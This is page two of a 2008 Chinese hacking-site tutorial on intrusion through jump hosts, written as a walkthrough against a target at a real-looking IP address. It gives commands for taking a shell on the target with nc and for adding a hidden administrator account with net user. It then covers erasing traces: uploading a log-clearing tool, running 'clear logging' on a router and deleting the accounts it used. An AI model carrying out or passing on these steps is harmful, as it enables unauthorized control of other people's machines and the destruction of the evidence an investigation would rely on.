我爱黑客网首页 设为首页
加入收藏
联系我们
 首 页  技术文章 下载中心 站长学院 交流论坛
 软件:
 文章:        教程:
 推荐: 我爱黑客网论坛
 
 
 
 
   
黑软: Q Q 软件 木马间谍 探嗅监听 溢出攻击 加密解密 漏洞扫描 脚本注入 远程控制 综合利用 聊天工具  
 
技术文章: 爱黑新闻 | 黑客攻防 | 安全防御 | 程序设计 | 系统操作 | 网络技术 | 本站动态 | 业界动态 | 安全公告 | 病毒公告
 
 
您当前的位置:我爱黑客网 -> 黑客攻防 -> 攻防实战 -> 文章内容  
栏目导航
· Q Q 攻防 · 黑客入门
· 攻防实战 · 安全初步
· 工具详解 · 黑客教程
· 漏洞研究 · 黑客编程
· 技术杂谈 · Exploit
热门文章
· 骇客学堂:简单入侵个..
· 轻松入侵个人免费空间..
· 教你入侵六合彩网拿会..
· 无线攻防:破解WEP密钥..
· 会员QQ重大漏洞
· 手把手教你入侵 win20..
· 怎样不用密码进入Wind..
· 我也做黑客:简单入侵个..
· 网吧冲钱从概念到实践..
· 黑客入门者如何获取肉..
· 黑客高手必懂基础内容..
· 我这样破解万象免费上..
相关文章

· [组图] 我在入侵过程..
· 一次简单的反入侵测..
· 另类巧妙,旁门左道入..
· 经典入侵检测术语全..
· IDS入侵检测系统的测..
· 入侵新技巧-Cmd下加..
· [组图] 记一次完整入..
· Microsoft SQL Serv..
· 一次简单的入侵,权..
· 139端口入侵简易教程..
查看更多与入侵检测三级跳 解析跳板技术(图)相关内容

入侵检测三级跳 解析跳板技术(图)
作者:我爱黑客网  来源:http://www.5ihack.com/  发布时间:2008-8-5 21:49:45  发布人:ghostfire

减小字体 增大字体

在工作平台上再打开一个cmd,输入命令 

 nc 211.52.118.84 3306

即监听该ip的3306端口,返回一个目标主机的shell,获取该主机的控制权。

javascript:return big(this)" height=256 alt=获取主机控制权 src="/article/UploadPic/2008-8/200885214948227.jpg" width=454 onload="javascript:if(this.width>498)this.style.width=498;">

在该shell上输入命令建立管理员用户

net user test test /add net localgour administrators test /add

下面看看对方是否开了远程桌面连接,在命令行下敲入命令

netstat -ano

如图9所示,对方开了3389端口,即可以进行远程桌面的连接。

javascript:return big(this)" height=277 alt=查看目标主机端口开放情况 src="/article/UploadPic/2008-8/200885214948968.jpg" width=430 onload="javascript:if(this.width>498)this.style.width=498;">

由于对方是XP系统,不能多用户远程连接,笔者的入侵检测到此为止。

5、全身而退

入侵完成获得目标主机的管理权限,入侵者就得擦除痕迹,准备撤退了。

(1).由于从目标主机获得的shell反向连接获得的,不会有日志记录,所以不用管直接断开连接。

(2).上传clearlog工具,清除telnet主机上的登陆日志。

(3).输入exit,退出路由器到主机的的telnet连接。在路由器上输入

clear logging

分别用来清除登陆日志。

javascript:return big(this)" style="WIDTH: 498px" height=193 alt=清除登陆日志 src="/article/UploadPic/2008-8/200885214949545.jpg" width=500 onload="javascript:if(this.width>498)this.style.width=498;">

(4).退出路由器登陆,通过工具清除远程桌面主机上的登陆日志,然后删除登录用帐户和用户目录,注销用户。

总结:上面笔者结合实例演示了入侵者如何通过跳板进行入侵以及入侵善后的全过程,本文只是从技术的角度对跳板技术进行解析,目的是让有兴趣的读者直观地了解跳板技术的相关细节。当然,跳板技术是博大精深,远非本文所能囊括,但其基本原来都类似,希望文本对大家了解这种技术有所帮助。

上一页  [1] [2] 

查看更多与入侵检测三级跳 解析跳板技术(图)相关内容

[ ] [返回上一页] [打 印] [收 藏]
上一篇文章:
下一篇文章:
      139端口入侵简易教程       一次简单的入侵,权作Mysql5注射备份
∷相关文章评论∷   (评论内容只代表网友观点,与本站立场无关!) [发表评论]
 
 
 
 
晋ICP备05008232   维护网络安全、传播安全技术才是我们的目标! 
 
关于本站 - 网站帮助 - - 下载声明 - 友情连接 -网站地图